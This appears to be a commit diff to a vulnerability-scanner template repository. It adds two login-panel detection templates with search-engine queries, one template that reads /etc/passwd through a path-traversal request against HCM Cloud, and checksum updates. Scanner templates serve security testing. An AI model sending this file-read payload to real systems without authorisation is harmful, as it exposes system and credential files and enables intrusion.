# digest: 4a0a0047304502204d1fa41448e33d7bdc708a0c0cfefcb5cb74c19e863fdd219d62933fbfed9427022100979820fcbf072d12baefa23aca5ee99edaac434379017e9b00feb2abab3de987:922c64590222798bb761d5b6d8e72950

30
http/exposed-panels/1password-scim-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: 1password-scim-panel
info:
name: 1Password SCIM Bridge - Panel
author: Splint3r7
severity: info
description: |
1Password SCIM Bridge Login was detected.
classification:
cwe-id: CWE-200
metadata:
max-request: 1
shodan-query: http.title:"1Password SCIM Bridge Login"
tags: panel,1password,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains_any(body, "1Password SCIM Bridge Login", "scim-bridge-logo")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220273efa2c962c1449fec38b3d098131d1a6662c122f71a2546cf4457f462e2fc5022100ec141b841154859bb27c6ad26e87c9a5e934fdf5ad1f71da7d12216d506c96ef:922c64590222798bb761d5b6d8e72950

30
http/exposed-panels/reolink-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: reolink-panel
info:
name: Reolink Panel - Detect
author: s4e-io
severity: info
description: |
Reolink panel was discovered.
metadata:
verified: true
max-request: 1
fofa-query: "Reolink"
shodan-query: title:"Reolink"
tags: panel,login,reolink,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains(body, "Reolink</title>")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100972074f41e35ce0c2c5e9c66f417208fe38d99127faac925683889cbe52c9700022100dbb2f66c6e5448bfa41dce0ecae14894006d99baa678514d395d2db8acbf344f:922c64590222798bb761d5b6d8e72950

30
http/vulnerabilities/hcm/hcm-cloud-lfi.yaml Normal file
View File

@ -0,0 +1,30 @@
id: hcm-cloud-lfi
info:
name: HCM Cloud - Arbitrary File Read
author: s4e-io
severity: high
description: |
HCM-Cloud professional human resources platform in the cloud download Arbitrary file read vulnerability.
reference:
- https://mp.weixin.qq.com/s/nvV7_ZGDqSUZJ5FNEWDhKw
- https://github.com/wy876/POC/blob/main/%E6%B5%AA%E6%BD%AE%E4%BA%91/HCM-Cloud%E4%BA%91%E7%AB%AF%E4%B8%93%E4%B8%9A%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E5%B9%B3%E5%8F%B0download%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-859381597"
tags: hcm-cloud,lfi,hcm
http:
- method: GET
path:
- "{{BaseURL}}/api/model_report/file/download?index=/&ext=/etc/passwd"
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(content_type, "application/octet-stream")'
- "status_code == 200"
condition: and
# digest: 4a0a00473045022026d56dc5db7d021f9588ce83480002e6e15ec8a5b9d2247a75272f80ddc3e6d302210090d0666fb6a8b8fa1f467c96c1103565befbdbfda3b88aa72ab7266ae13f84e7:922c64590222798bb761d5b6d8e72950

23
templates-checksum.txt
View File

@ -29,6 +29,10 @@ cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml:3a67a177c3537b361b26b549a
cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml:660261dce36382f203ec7e16e01d2e29f9bf7836
cloud/aws/cloudwatch/cw-alarm-action-set.yaml:b02b7e970b71be76717b5fc7e132b23adb5048e0
cloud/aws/cloudwatch/cw-alarms-actions.yaml:f0198d619bebd6afa41568d0c8c9bac456261021
cloud/aws/dms/dms-multi-az.yaml:cb3e1113188a1770d764c97a19ea3d608a3ff718
cloud/aws/dms/dms-public-access.yaml:e8eee10542c4723e8cec23eb25eaa536f8ba4fbd
cloud/aws/dms/dms-version-upgrade.yaml:969893df5f59cb6d06ce7e156028baa3a23682b0
cloud/aws/ebs/ebs-encryption-disabled.yaml:c7ccebdd432abae71c809226591cf9ace3cacad3
cloud/aws/ec2/ec2-imdsv2.yaml:bb7909c4b9b433dd90c343b3a03122f9c5c310a0
cloud/aws/ec2/ec2-public-ip.yaml:5fb5ee7dd9d51781a4a2903a0cb05b21fa586f85
cloud/aws/ec2/ec2-sg-egress-open.yaml:047f551aa108926349f69ba8d47189d88b7aab01
@ -54,6 +58,8 @@ cloud/aws/ec2/ec2-unrestricted-ssh.yaml:92a1200da475f085c33d0f86edd3077ba19eea33
cloud/aws/ec2/ec2-unrestricted-telnet.yaml:d7f80cec0723d2723300c078552824ec1a8b641a
cloud/aws/ec2/publicly-shared-ami.yaml:49e3f4939b9991f5ac9db99fbb7f7caba021227d
cloud/aws/ec2/unencrypted-aws-ami.yaml:35fc4a61e70120df3aafba92b4153ffa5b8c92b6
cloud/aws/firehose/firehose-server-destination-encryption.yaml:8d734f21761ffb41988d3d216b7e9f7aa7bd5f48
cloud/aws/firehose/firehose-server-side-encryption.yaml:5e78f1b9a1d2eeb44b87f9af6d9699a493b4e80a
cloud/aws/iam/iam-access-analyzer.yaml:f50b212fc028372e3aeba52e43c0417c845a01a9
cloud/aws/iam/iam-expired-ssl.yaml:a2ec4618352430440ddb4d7704058a4c7507d3f8
cloud/aws/iam/iam-full-admin-privileges.yaml:ab5d0948a725aa5a9a1059d6b7c0ae9f5d846d06
@ -419,8 +425,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
contributors.json:74b3e1af12d1f57440d4bbd006dacf6eda56785a
cves.json:1f9c64298a7fdb69876fad1267c4671f73a5a024
cves.json-checksum.txt:b7786a85233a460e34b9cd4fb0f0b8d7d9290e4f
cves.json:d801cb10fa8d00e27a3846145d6634c66bafccf8
cves.json-checksum.txt:4143244c4fec9f8bedb78c0ceb14a368b532782c
dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730
dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752
dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e
@ -3672,6 +3678,7 @@ http/cves/2023/CVE-2023-6909.yaml:49445ba4c9f3657098a5b90e0139e370ad4b0e22
http/cves/2023/CVE-2023-6977.yaml:92c599645f0079a1292d86ff4c56dddc787b5818
http/cves/2023/CVE-2023-6989.yaml:f42110a36f2bf7b8c62a72a752a69c8db52480c5
http/cves/2023/CVE-2023-7028.yaml:0ce7fc4083aa99ba9c914582ed064b84b50d22a2
http/cves/2024/CVE-2016-9299.yaml:9d44b30c8d0646f6e537110619b64cea85d33025
http/cves/2024/CVE-2024-0195.yaml:091e10588a00fadab2e1e67d7ce5f8d286e7d3d2
http/cves/2024/CVE-2024-0200.yaml:aaa2f2a6703a042cdff54922d03d08e7f649a3ad
http/cves/2024/CVE-2024-0204.yaml:a5dd990f0b300285f5d71eb7300852fc580c358a
@ -3873,7 +3880,7 @@ http/cves/2024/CVE-2024-4885.yaml:4ed235e0b33138d6382df49594465c551a54c788
http/cves/2024/CVE-2024-48914.yaml:b27547a769516a91b02ffd72ac8f8ce32da86482
http/cves/2024/CVE-2024-4940.yaml:5ce4ed65bd103d8a7791414015bb8cf507885305
http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a
http/cves/2024/CVE-2024-49757.yaml:249c629be1603354f68060f37cf6398221f30222
http/cves/2024/CVE-2024-49757.yaml:5a48ed3ba12227bae818ea35a200145217b35d3f
http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68
http/cves/2024/CVE-2024-5217.yaml:4fadf394def4c4b705871b805aced6715c7a2a06
http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c
@ -3940,10 +3947,13 @@ http/cves/2024/CVE-2024-8752.yaml:f0f9dca783b57c1fd5e47592e224f888d47c1747
http/cves/2024/CVE-2024-8877.yaml:d5b12c9a0e91fabea84efd078485f4fd57703738
http/cves/2024/CVE-2024-8883.yaml:e02b12d824d8f4df3edd0ee981eb0284215409dd
http/cves/2024/CVE-2024-9014.yaml:ea54c9f07357a92fb915794e7be909d11545753f
http/cves/2024/CVE-2024-9061.yaml:9c44d7fb4a27fd9f40a791d617b7e21981772b70
http/cves/2024/CVE-2024-9234.yaml:b8d98cd3fce5725e967dfb1c4cc22b4eefcbcd7c
http/cves/2024/CVE-2024-9463.yaml:80dc0d8f82b6d69a77dbdbfcc20988bbcfbc83f1
http/cves/2024/CVE-2024-9465.yaml:cc95c8e163ea7ba487f5a09bddc953485559de1c
http/cves/2024/CVE-2024-9593.yaml:b5592584dd80c8cd4e33f192f0142a28e11ce557
http/cves/2024/CVE-2024-9617.yaml:7cb4fee2a032853c8bdab68ab3ab8fad718c3a23
http/cves/2024/CVE-2024-9796.yaml:63320eed168e12210192edea9a986bee738d4ae5
http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3
http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce
http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda
@ -4167,6 +4177,7 @@ http/default-logins/yealink/yealink-default-login.yaml:1c09abc636a37838c637cc287
http/default-logins/zabbix/zabbix-default-login.yaml:039c6303b088546c9f54e85481d65de7927262e4
http/default-logins/zebra/zebra-printer-default-login.yaml:e8e3085df0ca4f9062f0c10855e1c1b6908ec189
http/default-logins/zmanda/zmanda-default-login.yaml:8c81afd379909dea4700a9204c4f38a9b2c0df17
http/exposed-panels/1password-scim-panel.yaml:65a0e1ff296b07247ef0292119dc45de6332f9df
http/exposed-panels/3cx-phone-management-panel.yaml:e7a814bb90b5ad57f2e4e643f7a87496a92dad8e
http/exposed-panels/3cx-phone-webclient-management-panel.yaml:e0c9fdfc6a9ea4d1daece9ef526d481f672b4a6a
http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cca5984
@ -4866,7 +4877,7 @@ http/exposed-panels/ollama-llm-panel.yaml:d03925e708d955ad60baf6e1114cae81bbc0c2
http/exposed-panels/olt-web-interface.yaml:bd13acc8c195cbf26aa41fe65aa499740e6332e4
http/exposed-panels/olympic-panel.yaml:858b214bfbb07e460ff29ba93cada9e90b22cef6
http/exposed-panels/omniampx-panel.yaml:56105e601d3cc844fb99879aa995176faac92dcf
http/exposed-panels/onedev-panel.yaml:778521f437f02b656bcb661a0799a2974d43ea55
http/exposed-panels/onedev-panel.yaml:6aec846d56b8cb5b0aceddf0267a858c53c7cc90
http/exposed-panels/onlyoffice-login-panel.yaml:044f6d420976bc9f2a4063cfe33d22ab3b4ea351
http/exposed-panels/open-game-panel.yaml:59efeff7e08a70e689ab77521a82be8e41709028
http/exposed-panels/open-stack-dashboard-login.yaml:68ffbeb500d7df7d11de2f399d5579983e714ef7
@ -5015,6 +5026,7 @@ http/exposed-panels/regify-panel.yaml:7af46ff8dbd0743a178b02b1c8ce2c2206ec5ae5
http/exposed-panels/remedy-axis-login.yaml:b676bbce4e0ea774bff50f84e9bce159c790ca6f
http/exposed-panels/remkon-manager-panel.yaml:7aaca85bb4d742edb3cafe770445522d2ff3b31d
http/exposed-panels/remote-ui-login.yaml:0335d3e84ec1b5927b4e71e30de2fcacd40a33c3
http/exposed-panels/reolink-panel.yaml:3608e84b6525ab89f7b9a809e5e4ff9330e850fc
http/exposed-panels/repetier-server-panel.yaml:6b57a80bb46f006aa09fa69262e84ead2ba276c0
http/exposed-panels/reportico-admin-panel.yaml:a456a00c6ced7e1c1096511440e45372e017a0b8
http/exposed-panels/residential-gateway-login.yaml:6245630106f122c0ed93fcc79e8ee754e90b2bbc
@ -8479,6 +8491,7 @@ http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:6c4f889193935b21ef25bdb52479408
http/vulnerabilities/gradio/gradio-lfi.yaml:34910ba1e5d2d62b9415ff89e9632e0a97198745
http/vulnerabilities/gradio/gradio-ssrf.yaml:c81b4d852de367dd51aa3c7a60a11672e92da709
http/vulnerabilities/grafana/grafana-file-read.yaml:953afdafb26e334177fd5a29c88434674d13b6e2
http/vulnerabilities/hcm/hcm-cloud-lfi.yaml:fb9dd54d8b49f84fc193bada0f5a4de09f7864b7
http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f
http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml:d4a5f3853a70adea141b8d68ee9a7c2d6ef44545
http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54
@ -9539,7 +9552,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
templates-checksum.txt:cce82f1b617c661f4ecb3a3b9b70f4aef6ecd42f
templates-checksum.txt:b3593609a5c788fe4bf0ad23ac7b9030d7031bb4
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4